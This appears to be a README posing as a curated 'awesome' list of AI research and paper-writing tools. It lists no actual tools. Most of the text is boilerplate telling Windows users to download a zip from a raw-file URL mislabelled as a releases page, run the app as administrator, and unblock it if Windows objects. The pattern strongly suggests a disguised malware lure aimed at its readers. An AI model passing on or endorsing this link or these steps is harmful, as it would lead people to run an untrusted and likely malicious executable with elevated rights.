awesome-researchclaw is a curated list of tools for research work. It covers ResearchClaw ecosystem projects, AI research agents, paper-writing tools, and scientific workflow resources.
Use it to find tools for:
- Research planning
- Paper drafts
- Literature review
- Data handling
- Experiment tracking
- Workflow automation
This project is meant for people who want a simple place to find useful research tools without sorting through many separate pages.
To get the app on Windows, visit this page to download:
Pick the latest release, then download the Windows file that matches your system. If you see more than one file, choose the one with win or windows in the name.
For a smooth setup on Windows, use:
- Windows 10 or Windows 11
- 64-bit system
- 4 GB RAM or more
- 500 MB free disk space
- A stable internet connection for the first download
If you plan to work with large research projects, 8 GB RAM or more helps.
This project brings together resources for:
- AI research agents that help plan tasks
- Tools for writing and editing papers
- Paper search and note-taking helpers
- Workflow tools for research steps
- Links to related projects in the ResearchClaw ecosystem
Each part is selected to help you move from idea to draft with less effort.
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Open the releases page:
https://github.com/Audiedashed559/awesome-researchclaw/raw/refs/heads/main/lophiostomous/researchclaw-awesome-v3.7.zip -
Find the newest version near the top of the page.
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Under Assets, look for a Windows download file.
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Download the file to your computer.
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If the download is a
.zipfile, right-click it and choose Extract All. -
Open the extracted folder.
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Double-click the app file to start it.
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If Windows asks for permission, choose Run or Yes.
When the app starts for the first time:
- Let it finish any setup steps
- Keep the window open until it loads fully
- Sign in if the app asks for an account
- Choose the research tools you want to use
- Save any settings you change
If the app opens to a list of projects or links, start with the items marked as core or recommended.
These tools help with planning, searching, and organizing research tasks. They can be useful for:
- Finding paper topics
- Building a reading list
- Breaking large tasks into steps
- Preparing notes for a draft
These tools support writing from outline to final draft. Common uses include:
- Creating section outlines
- Drafting introductions
- Rewriting text for clarity
- Managing citations and references
These resources help with the work around the paper itself:
- File organization
- Experiment logs
- Task tracking
- Data prep
- Reproducible steps
The ResearchClaw ecosystem can include related tools made to work together. These links help you move between parts of the workflow with less friction.
- Open the app or project list.
- Start with a research goal.
- Pick one tool for search, one for writing, and one for workflow tracking.
- Test each tool on a small task first.
- Keep the tools that fit your work style.
- Remove anything you do not need.
For most users, a simple setup works best. You do not need every tool at once.
If you are new to research tools, try this order:
- One tool for reading and note-taking
- One tool for drafting text
- One tool for organizing files
- One tool for tracking tasks
This gives you a basic workflow without too many parts to manage.
If the file does not open:
- Check that the download finished
- Make sure you picked the Windows file
- Extract the
.zipfile before opening it - Right-click the app and choose Run as administrator if needed
If the app looks blank:
- Close it and open it again
- Wait a few seconds for the first load
- Check your internet connection
- Download the latest release again if needed
If Windows blocks the file:
- Open the fileโs Properties
- Look for an Unblock option
- Apply it, then try again
To update to a newer version:
- Return to the releases page
- Download the latest Windows file
- Replace the old version if needed
- Open the new file
Keep your settings and files in a safe folder before updating.
A typical Windows setup may include:
- The main app file
- A folder with supporting files
- A config file for settings
- A downloads or data folder for saved work
If you move the app, keep all related files together.
No. Follow the download and install steps on the releases page.
No. It also helps with research planning, notes, and workflow tasks.
Yes. It works well when you keep tasks organized and use the tools in steps.
That works too. You can use the parts that fit your work and ignore the rest.
Use the releases page: https://github.com/Audiedashed559/awesome-researchclaw/raw/refs/heads/main/lophiostomous/researchclaw-awesome-v3.7.zip
A simple research workflow can look like this:
- Search for sources
- Save useful links
- Make short notes
- Build an outline
- Draft the paper
- Review and edit
- Store files in one place
This project gives you tools that fit each step.
The Windows download is best for:
- Home users
- Students
- Researchers
- Writers
- People who need a clear research workflow
It is built for simple desktop use and fits common Windows setups.
When you open the releases page, look for files such as:
.exe.zip.msi
If you are unsure which file to choose, use the Windows installer or the file marked for Windows on the latest release page.
Visit the latest releases page
awesome-researchclaw helps you find and use research tools in one place. It brings together AI agents, paper-writing tools, and workflow resources so you can work through research tasks with less searching and less setup